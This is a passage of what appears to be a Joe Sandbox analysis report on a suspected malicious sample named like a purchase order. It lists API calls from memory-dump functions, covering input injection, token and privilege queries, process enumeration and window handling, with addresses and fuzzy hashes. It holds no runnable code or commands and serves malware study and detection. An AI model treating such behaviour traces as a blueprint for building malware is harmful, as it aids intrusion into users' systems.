                                • Associated: 00000000.00000002.2061698110.0000000000212000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2061743079.000000000021C000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2061759854.0000000000224000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_150000_PO2-2401-0016 (TR).jbxd
                                Similarity
                                • API ID: LongWindow$InvalidateMessageRectSend
                                • String ID:
                                • API String ID: 3340791633-0
                                • Opcode ID: 6ddcfbc5c881e481c6dcf27d6a83fc9ead0e6f431b5b1ac3b676930c20402cbf
                                • Instruction ID: 2f491a41d5217aa22529be37b900f4ffd0c0111fb5350edc33af9b2b97fbca84
                                • Opcode Fuzzy Hash: 6ddcfbc5c881e481c6dcf27d6a83fc9ead0e6f431b5b1ac3b676930c20402cbf
                                • Instruction Fuzzy Hash: BA31DE34A55E88EFEB349A56CC46FED7767BB04398F584102FA10962E1C7B09980DB82
                                APIs
                                • GetKeyboardState.USER32(?,75A8C0D0,?,00008000), ref: 001BABF1
                                • SetKeyboardState.USER32(00000080,?,00008000), ref: 001BAC0D
                                • PostMessageW.USER32(00000000,00000101,00000000), ref: 001BAC74
                                • SendInput.USER32(00000001,?,0000001C,75A8C0D0,?,00008000), ref: 001BACC6
                                Memory Dump Source
                                • Source File: 00000000.00000002.2061643602.0000000000151000.00000020.00000001.01000000.00000003.sdmp, Offset: 00150000, based on PE: true
                                • Associated: 00000000.00000002.2061626649.0000000000150000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2061698110.00000000001EC000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2061698110.0000000000212000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2061743079.000000000021C000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2061759854.0000000000224000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_150000_PO2-2401-0016 (TR).jbxd
                                Similarity
                                • API ID: KeyboardState$InputMessagePostSend
                                • String ID:
                                • API String ID: 432972143-0
                                • Opcode ID: 6477ab89c30603a7aba665810f201caeed835101f4099f51ddf11a32736d61c5
                                • Instruction ID: f37f863ee7e4d19b67551c6ca7b10cd812deb7ff55473df822427f5c7b52313f
                                • Opcode Fuzzy Hash: 6477ab89c30603a7aba665810f201caeed835101f4099f51ddf11a32736d61c5
                                • Instruction Fuzzy Hash: E9314630A00358AFFF35CB65CC497FE7FA5AF89310F84431AE481962D1D374998187A2
                                APIs
                                • ClientToScreen.USER32(?,?), ref: 001E769A
                                • GetWindowRect.USER32(?,?), ref: 001E7710
                                • PtInRect.USER32(?,?,001E8B89), ref: 001E7720
                                • MessageBeep.USER32(00000000), ref: 001E778C
                                Memory Dump Source
                                • Source File: 00000000.00000002.2061643602.0000000000151000.00000020.00000001.01000000.00000003.sdmp, Offset: 00150000, based on PE: true
                                • Associated: 00000000.00000002.2061626649.0000000000150000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2061698110.00000000001EC000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2061698110.0000000000212000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2061743079.000000000021C000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2061759854.0000000000224000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_150000_PO2-2401-0016 (TR).jbxd
                                Similarity
                                • API ID: Rect$BeepClientMessageScreenWindow
                                • String ID:
                                • API String ID: 1352109105-0
                                • Opcode ID: 4629f8127e45e0c8963f1aa0c37110ea99fda3b5b60cafb8b862a192fbb9d5a2
                                • Instruction ID: a3581d90bca773694823afcefeba1646b45447e3f13d2e62680492b372ca3202
                                • Opcode Fuzzy Hash: 4629f8127e45e0c8963f1aa0c37110ea99fda3b5b60cafb8b862a192fbb9d5a2
                                • Instruction Fuzzy Hash: 0841A034A05694EFEB11CF9AD898EADB7F4FF59304F1540A8E4149B2A1C330A982CF90
                                APIs
                                • GetForegroundWindow.USER32 ref: 001E16EB
                                  • Part of subcall function 001B3A3D: GetWindowThreadProcessId.USER32(?,00000000), ref: 001B3A57
                                  • Part of subcall function 001B3A3D: GetCurrentThreadId.KERNEL32 ref: 001B3A5E
                                  • Part of subcall function 001B3A3D: AttachThreadInput.USER32(00000000,?,00000000,00000000,?,001B25B3), ref: 001B3A65
                                • GetCaretPos.USER32(?), ref: 001E16FF
                                • ClientToScreen.USER32(00000000,?), ref: 001E174C
                                • GetForegroundWindow.USER32 ref: 001E1752
                                Memory Dump Source
                                • Source File: 00000000.00000002.2061643602.0000000000151000.00000020.00000001.01000000.00000003.sdmp, Offset: 00150000, based on PE: true
                                • Associated: 00000000.00000002.2061626649.0000000000150000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2061698110.00000000001EC000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2061698110.0000000000212000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2061743079.000000000021C000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2061759854.0000000000224000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_150000_PO2-2401-0016 (TR).jbxd
                                Similarity
                                • API ID: ThreadWindow$Foreground$AttachCaretClientCurrentInputProcessScreen
                                • String ID:
                                • API String ID: 2759813231-0
                                • Opcode ID: d3b4568b24014f481bf9af61d4623a5633ab50429f6427e0f9ca334ea04c68d4
                                • Instruction ID: c278c9112368146cd88649b30dac667456a3d0518a0da61756d4290197422b01
                                • Opcode Fuzzy Hash: d3b4568b24014f481bf9af61d4623a5633ab50429f6427e0f9ca334ea04c68d4
                                • Instruction Fuzzy Hash: B7314171D00249AFC704EFAAC8C1CEEB7F9EF59304B50806AE425EB251D7719E45CBA0
                                APIs
                                • CreateToolhelp32Snapshot.KERNEL32 ref: 001BD501
                                • Process32FirstW.KERNEL32(00000000,?), ref: 001BD50F
                                • Process32NextW.KERNEL32(00000000,?), ref: 001BD52F
                                • CloseHandle.KERNEL32(00000000), ref: 001BD5DC
                                Memory Dump Source
                                • Source File: 00000000.00000002.2061643602.0000000000151000.00000020.00000001.01000000.00000003.sdmp, Offset: 00150000, based on PE: true
                                • Associated: 00000000.00000002.2061626649.0000000000150000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2061698110.00000000001EC000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2061698110.0000000000212000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2061743079.000000000021C000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2061759854.0000000000224000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_150000_PO2-2401-0016 (TR).jbxd
                                Similarity
                                • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32
                                • String ID:
                                • API String ID: 420147892-0
                                • Opcode ID: 2f8b96bb3a6310d1efe4cb2e5441f15f19306e0600d5b100c3cb6c1b5dd0b5a7
                                • Instruction ID: 47fcbbaa182a48eac7e539164a4c5f0a60f023f616c78ad5da5e7a6c0caacac8
                                • Opcode Fuzzy Hash: 2f8b96bb3a6310d1efe4cb2e5441f15f19306e0600d5b100c3cb6c1b5dd0b5a7
                                • Instruction Fuzzy Hash: 19319031008340DFD314EF54D881AAFBBF8EFA9344F54092DF9918A1A1EB719989CB92
                                APIs
                                  • Part of subcall function 00169BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 00169BB2
                                • GetCursorPos.USER32(?), ref: 001E9001
                                • TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000,?,001A7711,?,?,?,?,?), ref: 001E9016
                                • GetCursorPos.USER32(?), ref: 001E905E
                                • DefDlgProcW.USER32(?,0000007B,?,?,?,?,?,?,?,?,?,?,001A7711,?,?,?), ref: 001E9094
                                Memory Dump Source
                                • Source File: 00000000.00000002.2061643602.0000000000151000.00000020.00000001.01000000.00000003.sdmp, Offset: 00150000, based on PE: true
                                • Associated: 00000000.00000002.2061626649.0000000000150000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2061698110.00000000001EC000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2061698110.0000000000212000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2061743079.000000000021C000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2061759854.0000000000224000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_150000_PO2-2401-0016 (TR).jbxd
                                Similarity
                                • API ID: Cursor$LongMenuPopupProcTrackWindow
                                • String ID:
                                • API String ID: 2864067406-0
                                • Opcode ID: e535c185c1f15933aca1b70ebabde5f8722bf9a449ea88d2e62c704b2825381c
                                • Instruction ID: 07a48393b80b178ff8dc94814b513866549663635535062e04964ad28ab26fb0
                                • Opcode Fuzzy Hash: e535c185c1f15933aca1b70ebabde5f8722bf9a449ea88d2e62c704b2825381c
                                • Instruction Fuzzy Hash: C221D172600558FFCB258F95CC98EFE7BB9EF89350F444055F9058B261C3319AA1DBA0
                                APIs
                                • GetFileAttributesW.KERNEL32(?,001ECB68), ref: 001BD2FB
                                • GetLastError.KERNEL32 ref: 001BD30A
                                • CreateDirectoryW.KERNEL32(?,00000000), ref: 001BD319
                                • CreateDirectoryW.KERNEL32(?,00000000,00000000,000000FF,001ECB68), ref: 001BD376
                                Memory Dump Source
                                • Source File: 00000000.00000002.2061643602.0000000000151000.00000020.00000001.01000000.00000003.sdmp, Offset: 00150000, based on PE: true
                                • Associated: 00000000.00000002.2061626649.0000000000150000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2061698110.00000000001EC000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2061698110.0000000000212000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2061743079.000000000021C000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2061759854.0000000000224000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_150000_PO2-2401-0016 (TR).jbxd
                                Similarity
                                • API ID: CreateDirectory$AttributesErrorFileLast
                                • String ID:
                                • API String ID: 2267087916-0
                                • Opcode ID: 4c441b3c6af76c3074bbbad3764ad812c3a8915df5723480c79fb1e8f9c9d735
                                • Instruction ID: 63dc299bb64272bf914e0637f6592426d026b28c3aae46a2320fdac3ec6dcbea
                                • Opcode Fuzzy Hash: 4c441b3c6af76c3074bbbad3764ad812c3a8915df5723480c79fb1e8f9c9d735
                                • Instruction Fuzzy Hash: 9D2171B0505301DF8718DF68D8814AE77E4BF55764F104A1DF8A9CB2A2E731D94ACB93
                                APIs
                                  • Part of subcall function 001B1014: GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 001B102A
                                  • Part of subcall function 001B1014: GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 001B1036
                                  • Part of subcall function 001B1014: GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 001B1045
                                  • Part of subcall function 001B1014: HeapAlloc.KERNEL32(00000000,?,TokenIntegrityLevel,?,00000000,?), ref: 001B104C
                                  • Part of subcall function 001B1014: GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 001B1062
                                • LookupPrivilegeValueW.ADVAPI32(00000000,?,?), ref: 001B15BE
                                • _memcmp.LIBVCRUNTIME ref: 001B15E1
                                • GetProcessHeap.KERNEL32(00000000,00000000), ref: 001B1617
                                • HeapFree.KERNEL32(00000000), ref: 001B161E
                                Memory Dump Source
                                • Source File: 00000000.00000002.2061643602.0000000000151000.00000020.00000001.01000000.00000003.sdmp, Offset: 00150000, based on PE: true
                                 • Associated: 00000000.00000002.2061626649.0000000000150000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2061698110.00000000001EC000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2061698110.0000000000212000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2061743079.000000000021C000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2061759854.0000000000224000.00000002.00000001.01000000.00000003.sdmp
                                Similarity
                                • API ID: Heap$InformationProcessToken$AllocErrorFreeLastLookupPrivilegeValue_memcmp
                                • String ID:
                                • API String ID: 1592001646-0
                                • Opcode ID: ac69ad9dd6e82f02be1710118516b122188af3c4a00bab0af07b2e88e27ccdeb
                                • Instruction ID: 43b7fdb36078d8ec6117ca69dadcea068772ad06f5cd4ad79c6a2b8bf60ef420
                                • Opcode Fuzzy Hash: ac69ad9dd6e82f02be1710118516b122188af3c4a00bab0af07b2e88e27ccdeb
                                • Instruction Fuzzy Hash: 1E21AC32E00208FFDF10DFA5C965BEEB7B8EF45354F4A8459E441AB241E770AA45CBA0
                                APIs
                                • GetWindowLongW.USER32(?,000000EC), ref: 001E280A
                                • SetWindowLongW.USER32(?,000000EC,00000000), ref: 001E2824
                                • SetWindowLongW.USER32(?,000000EC,00000000), ref: 001E2832
                                • SetLayeredWindowAttributes.USER32(?,00000000,?,00000002), ref: 001E2840
                                Similarity
                                • API ID: Window$Long$AttributesLayered
                                • String ID:
                                • API String ID: 2169480361-0
                                • Opcode ID: 925569be6043f9d6feb2175d21ae382dc31a89cae82aed4f684f0df756de9f71
                                • Instruction ID: 5418bf91bd2b4b1b0f5f122f834d851e36490f72e5258ff4e49beafd6c6d075e
                                • Opcode Fuzzy Hash: 925569be6043f9d6feb2175d21ae382dc31a89cae82aed4f684f0df756de9f71
                                • Instruction Fuzzy Hash: 1121F431604990AFD7149B25CC95FAE7799AF95324F148158F8268F6D2C771FC82C7D0
                                APIs
                                  • Part of subcall function 001B8D7D: lstrlenW.KERNEL32(?,00000002,000000FF,?,?,?,001B790A,?,000000FF,?,001B8754,00000000,?,0000001C,?,?), ref: 001B8D8C
                                  • Part of subcall function 001B8D7D: lstrcpyW.KERNEL32(00000000,?,?,001B790A,?,000000FF,?,001B8754,00000000,?,0000001C,?,?,00000000), ref: 001B8DB2
                                  • Part of subcall function 001B8D7D: lstrcmpiW.KERNEL32(00000000,?,001B790A,?,000000FF,?,001B8754,00000000,?,0000001C,?,?), ref: 001B8DE3
                                • lstrlenW.KERNEL32(?,00000002,000000FF,?,000000FF,?,001B8754,00000000,?,0000001C,?,?,00000000), ref: 001B7923
                                • lstrcpyW.KERNEL32(00000000,?,?,001B8754,00000000,?,0000001C,?,?,00000000), ref: 001B7949
                                • lstrcmpiW.KERNEL32(00000002,cdecl,?,001B8754,00000000,?,0000001C,?,?,00000000), ref: 001B7984
                                Similarity
                                • API ID: lstrcmpilstrcpylstrlen
                                • String ID: cdecl
                                • API String ID: 4031866154-3896280584
                                • Opcode ID: 62898e2989056329b1dd83b657688bb42bb695ffa3c83f07d2daba4b323e84ef
                                • Instruction ID: 446d6b0ead6fe286b82933afe4687ab0f7115d3e0fded0719ee9be3b60822383
                                • Opcode Fuzzy Hash: 62898e2989056329b1dd83b657688bb42bb695ffa3c83f07d2daba4b323e84ef
                                • Instruction Fuzzy Hash: 1D11263A200342ABCB15AF74DC44DBA77A9FF95764B00402AF802CB2A4EB31D812C7A1
                                APIs
                                • SendMessageW.USER32(?,00001060,?,00000004), ref: 001E56BB
                                • _wcslen.LIBCMT ref: 001E56CD
                                • _wcslen.LIBCMT ref: 001E56D8
                                • SendMessageW.USER32(?,00001002,00000000,?), ref: 001E5816
                                Similarity
                                • API ID: MessageSend_wcslen
                                • String ID:
                                • API String ID: 455545452-0
                                • Opcode ID: 40bf852205a2e3ed2b573aec4d818db821c837c8d2ef5a682801f3d5bfe88e61
                                • Instruction ID: 67c7610adf6a37e576d34c0914502f3ebba8f9f4fd3809ff34131aaf7ff82c02
                                • Opcode Fuzzy Hash: 40bf852205a2e3ed2b573aec4d818db821c837c8d2ef5a682801f3d5bfe88e61
                                • Instruction Fuzzy Hash: 1111D375A00A99A6DF209FA2CCC5AEE77BCEF15768F148026F915D6081E770CA80CB60
                                APIs
                                • SendMessageW.USER32(?,000000B0,?,?), ref: 001B1A47
                                • SendMessageW.USER32(?,000000C9,?,00000000), ref: 001B1A59
                                • SendMessageW.USER32(?,000000C9,?,00000000), ref: 001B1A6F
                                • SendMessageW.USER32(?,000000C9,?,00000000), ref: 001B1A8A
                                Similarity
                                • API ID: MessageSend
                                • String ID:
                                • API String ID: 3850602802-0
                                • Opcode ID: 085ab49516526fe55bbdb1cd7b8be5f960e25dc62bcd9746105befc6a88761b8
                                • Instruction ID: a40292b94913eb253cdb6edad3f77eaaf9eccec4fbceb0a93fb475b6c635bbc8
                                • Opcode Fuzzy Hash: 085ab49516526fe55bbdb1cd7b8be5f960e25dc62bcd9746105befc6a88761b8
                                • Instruction Fuzzy Hash: 5011273A901219FFEB109BA4CD85FEDBB79EB08750F210091EA00B7290D7716E50DB94
                                APIs
                                • GetCurrentThreadId.KERNEL32 ref: 001BE1FD
                                • MessageBoxW.USER32(?,?,?,?), ref: 001BE230
                                • WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,?,?), ref: 001BE246
                                • CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 001BE24D
                                Similarity
                                • API ID: CloseCurrentHandleMessageObjectSingleThreadWait
                                • String ID:
                                • API String ID: 2880819207-0
                                • Opcode ID: eaabe47dd14afea5e5b6b30c73dfd3e87c169bd923cad747b24d822996b34f39
                                • Instruction ID: abe6a3688d147d811b50f25573720d6fc33585df944201ba5b598f0da026f622
                                • Opcode Fuzzy Hash: eaabe47dd14afea5e5b6b30c73dfd3e87c169bd923cad747b24d822996b34f39
                                • Instruction Fuzzy Hash: E411E176904258BBC721DBE8AC49ADE7BEDAB45320F104299F825E3291D7B099018BA0
                                APIs
                                • CreateThread.KERNEL32(00000000,?,0017CFF9,00000000,00000004,00000000), ref: 0017D218
                                • GetLastError.KERNEL32 ref: 0017D224
                                • __dosmaperr.LIBCMT ref: 0017D22B
                                • ResumeThread.KERNEL32(00000000), ref: 0017D249
                                Similarity
                                • API ID: Thread$CreateErrorLastResume__dosmaperr
                                • String ID:
                                • API String ID: 173952441-0
                                • Opcode ID: 5311b664bebd7f6934e739e5906f2a7be05184c1ebcc9170ca65c972c1a7ca5a
                                • Instruction ID: fc3e66a432cae2e91e78886cfc5a2491d5d5ed5b3eac17a5a9f6fa94db7edfa8
                                • Opcode Fuzzy Hash: 5311b664bebd7f6934e739e5906f2a7be05184c1ebcc9170ca65c972c1a7ca5a
                                • Instruction Fuzzy Hash: DD01D236805208BBCB116BA5EC09BAF7A79EF91731F208219F929961D1CF70C942C6E0
                                APIs
                                • CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 0015604C
                                • GetStockObject.GDI32(00000011), ref: 00156060
                                • SendMessageW.USER32(00000000,00000030,00000000), ref: 0015606A
                                Similarity
                                • API ID: CreateMessageObjectSendStockWindow
                                • String ID:
                                • API String ID: 3970641297-0
                                • Opcode ID: 1cb52e8c67ebc31763f474ecf7ef256dc508458a9acce96b84c2275b1ab25be6
                                • Instruction ID: ca1273e21113052dea6ccfbe7369bdc883fc8abeabe74e4c71ce7eeee7016993
                                • Opcode Fuzzy Hash: 1cb52e8c67ebc31763f474ecf7ef256dc508458a9acce96b84c2275b1ab25be6
                                • Instruction Fuzzy Hash: 23118B72501648FFEF164FA4DC84EEABB69EF183A5F440201FE245A150C7369CA19BE0
                                APIs
                                • ___BuildCatchObject.LIBVCRUNTIME ref: 00173B56
                                  • Part of subcall function 00173AA3: BuildCatchObjectHelperInternal.LIBVCRUNTIME ref: 00173AD2
                                  • Part of subcall function 00173AA3: ___AdjustPointer.LIBCMT ref: 00173AED
                                • _UnwindNestedFrames.LIBCMT ref: 00173B6B
                                • __FrameHandler3::FrameUnwindToState.LIBVCRUNTIME ref: 00173B7C
                                • CallCatchBlock.LIBVCRUNTIME ref: 00173BA4
                                Similarity
                                • API ID: Catch$BuildFrameObjectUnwind$AdjustBlockCallFramesHandler3::HelperInternalNestedPointerState
                                • String ID:
                                • API String ID: 737400349-0
                                • Opcode ID: 12ea49abee573113f57dbd3ec3a577afcc9c348439d29e6cbe32e78011ac24d3
                                • Instruction ID: 63fdb484111fcd34d67418c56c921a40c69e77d129e60978e7f4185fed160a71
                                • Opcode Fuzzy Hash: 12ea49abee573113f57dbd3ec3a577afcc9c348439d29e6cbe32e78011ac24d3
                                • Instruction Fuzzy Hash: 6901E932100149BBDF125E95CC46EEB7B79EF58754F048018FE6C96121C732E961EBA1
                                APIs
                                • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,001513C6,00000000,00000000,?,0018301A,001513C6,00000000,00000000,00000000,?,0018328B,00000006,FlsSetValue), ref: 001830A5
                                • GetLastError.KERNEL32(?,0018301A,001513C6,00000000,00000000,00000000,?,0018328B,00000006,FlsSetValue,001F2290,FlsSetValue,00000000,00000364,?,00182E46), ref: 001830B1
                                • LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,0018301A,001513C6,00000000,00000000,00000000,?,0018328B,00000006,FlsSetValue,001F2290,FlsSetValue,00000000), ref: 001830BF
                                Similarity
                                • API ID: LibraryLoad$ErrorLast
                                • String ID:
                                • API String ID: 3177248105-0
                                • Opcode ID: 4468cca49bc91ffa9d4a19c46fcc8eabdb0abbd636da834eb60b895b1fb29170
                                • Instruction ID: e03e78561e1531b4bf3e80a5f7e45164ccd89b6627098c43311297549a8ccc8e
                                • Opcode Fuzzy Hash: 4468cca49bc91ffa9d4a19c46fcc8eabdb0abbd636da834eb60b895b1fb29170
                                • Instruction Fuzzy Hash: AA01A732751322EBCB315BF9AC8896B7B98AF45F61B190720F925E7540D721DB42CBE0
                                APIs
                                • GetModuleFileNameW.KERNEL32(?,?,00000104,00000000), ref: 001B747F
                                • LoadTypeLibEx.OLEAUT32(?,00000002,?), ref: 001B7497
                                • RegisterTypeLib.OLEAUT32(?,?,00000000), ref: 001B74AC
                                • RegisterTypeLibForUser.OLEAUT32(?,?,00000000), ref: 001B74CA
                                Similarity
                                • API ID: Type$Register$FileLoadModuleNameUser
                                • String ID:
                                • API String ID: 1352324309-0
                                • Opcode ID: 70be6c84edc64d056eb4cf2f5221a74543564703f454e3d7ed28dda09cd4a20a
                                • Instruction ID: 8a6267883d3a965de25dc564b9630db69c10a9853cea973606a28e5af70636d8
                                • Opcode Fuzzy Hash: 70be6c84edc64d056eb4cf2f5221a74543564703f454e3d7ed28dda09cd4a20a
                                • Instruction Fuzzy Hash: 5611A1B12093149BE7209F54DC48FD67BFCEB40B01F108969E616DA5D1D770E944DB90
                                APIs
                                • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,001BACD3,?,00008000), ref: 001BB0C4
                                • Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,001BACD3,?,00008000), ref: 001BB0E9
                                • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,001BACD3,?,00008000), ref: 001BB0F3
                                • Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,001BACD3,?,00008000), ref: 001BB126
                                Similarity
                                • API ID: CounterPerformanceQuerySleep
                                • String ID:
                                • API String ID: 2875609808-0
                                • Opcode ID: eba3e359d5183d3f03802919c0f87f922b98df4edd21ec01882598df3b64316f
                                • Instruction ID: d7d6ca2225c388a499725ca3b9db81e3dd8fdecdda71b296ed4896f4ad965c4d
                                • Opcode Fuzzy Hash: eba3e359d5183d3f03802919c0f87f922b98df4edd21ec01882598df3b64316f
                                • Instruction Fuzzy Hash: 4E113971C0552CE7CF04AFE8E9E86FEBB78FF0A711F114085E941B6681CBB096518B91
                                APIs
                                • SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,?), ref: 001B2DC5
                                • GetWindowThreadProcessId.USER32(?,00000000), ref: 001B2DD6
                                • GetCurrentThreadId.KERNEL32 ref: 001B2DDD
                                • AttachThreadInput.USER32(00000000,?,00000000,00000000), ref: 001B2DE4
                                Similarity
                                • API ID: Thread$AttachCurrentInputMessageProcessSendTimeoutWindow
                                • String ID:
                                • API String ID: 2710830443-0
                                • Opcode ID: 95c7b3b8bc58545193677c83e39086546a2ee8db14cb9dbf3674ceedbd74ee75
                                • Instruction ID: 78eb0e92972cfff952966d3d02f5f642e533261d353615e6875261b07e5b2489
                                • Opcode Fuzzy Hash: 95c7b3b8bc58545193677c83e39086546a2ee8db14cb9dbf3674ceedbd74ee75
                                • Instruction Fuzzy Hash: 9DE09272101224BBDB201BF29C4DFEF7E6CEF46BA1F000019F105D55809BA0C886C6F0
                                APIs
                                  • Part of subcall function 00169639: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 00169693
                                  • Part of subcall function 00169639: SelectObject.GDI32(?,00000000), ref: 001696A2
                                  • Part of subcall function 00169639: BeginPath.GDI32(?), ref: 001696B9
                                  • Part of subcall function 00169639: SelectObject.GDI32(?,00000000), ref: 001696E2
                                • MoveToEx.GDI32(?,00000000,00000000,00000000), ref: 001E8887
                                • LineTo.GDI32(?,?,?), ref: 001E8894
                                • EndPath.GDI32(?), ref: 001E88A4
                                • StrokePath.GDI32(?), ref: 001E88B2
                                Similarity
                                • API ID: Path$ObjectSelect$BeginCreateLineMoveStroke
                                • String ID:
                                • API String ID: 1539411459-0
                                • Opcode ID: c9951a552a88de4d3937dbfa378370f2818589534fd3bfa2054bf335c16571eb
                                • Instruction ID: 50293e575f18c032634952dc56eae5cdf6e1a3facc1927af38d952f567ffc050
                                • Opcode Fuzzy Hash: c9951a552a88de4d3937dbfa378370f2818589534fd3bfa2054bf335c16571eb
                                • Instruction Fuzzy Hash: 22F03A3A041698FADB125FD4AC0DFCE3A59AF16310F048000FE12690E1C77555A2CFE5
                                APIs
                                • GetSysColor.USER32(00000008), ref: 001698CC
                                • SetTextColor.GDI32(?,?), ref: 001698D6
                                • SetBkMode.GDI32(?,00000001), ref: 001698E9
                                • GetStockObject.GDI32(00000005), ref: 001698F1
                                Memory Dump Source
                                • Source File: 00000000.00000002.2061643602.0000000000151000.00000020.00000001.01000000.00000003.sdmp, Offset: 00150000, based on PE: true
                                • Associated: 00000000.00000002.2061626649.0000000000150000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2061698110.00000000001EC000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2061698110.0000000000212000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2061743079.000000000021C000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2061759854.0000000000224000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_150000_PO2-2401-0016 (TR).jbxd
                                Similarity
                                • API ID: Color$ModeObjectStockText
                                • String ID:
                                • API String ID: 4037423528-0
                                • Opcode ID: 9311caa5f2984efbdd564183020a999d9506f759f0d93f20172307b240d09d65
                                • Instruction ID: f1722d5a1ba19309466168c2a872140b64be357324a72ec4c6b13aadee6ecc6e
                                • Opcode Fuzzy Hash: 9311caa5f2984efbdd564183020a999d9506f759f0d93f20172307b240d09d65
                                • Instruction Fuzzy Hash: 13E06D31244680EADB215BB8EC49BEC3F61EB52736F048219F6FA584E1C37146919F10
                                APIs
                                • GetCurrentThread.KERNEL32 ref: 001B1634
                                • OpenThreadToken.ADVAPI32(00000000,?,?,?,001B11D9), ref: 001B163B
                                • GetCurrentProcess.KERNEL32(00000028,?,?,?,?,001B11D9), ref: 001B1648
                                • OpenProcessToken.ADVAPI32(00000000,?,?,?,001B11D9), ref: 001B164F
                                Memory Dump Source
                                • Source File: 00000000.00000002.2061643602.0000000000151000.00000020.00000001.01000000.00000003.sdmp, Offset: 00150000, based on PE: true
                                • Associated: 00000000.00000002.2061626649.0000000000150000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2061698110.00000000001EC000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2061698110.0000000000212000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2061743079.000000000021C000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2061759854.0000000000224000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_150000_PO2-2401-0016 (TR).jbxd
                                Similarity
                                • API ID: CurrentOpenProcessThreadToken
                                • String ID:
                                • API String ID: 3974789173-0
                                • Opcode ID: 3377e023383d48d1d342e99c16e6af86068c9f8d71506c7b86d0552998e938a4
                                • Instruction ID: 33f6b75816b53be5178a26024104fdc0deba0cd74ffa4cfa1b1d376cc20cebad
                                • Opcode Fuzzy Hash: 3377e023383d48d1d342e99c16e6af86068c9f8d71506c7b86d0552998e938a4
                                • Instruction Fuzzy Hash: 4DE08C36602211EBD7201FE4AE4DB8F3B7CAF547A2F158808F646CD080E7748482CBA0
                                APIs
                                • GetDesktopWindow.USER32 ref: 001AD858
                                • GetDC.USER32(00000000), ref: 001AD862
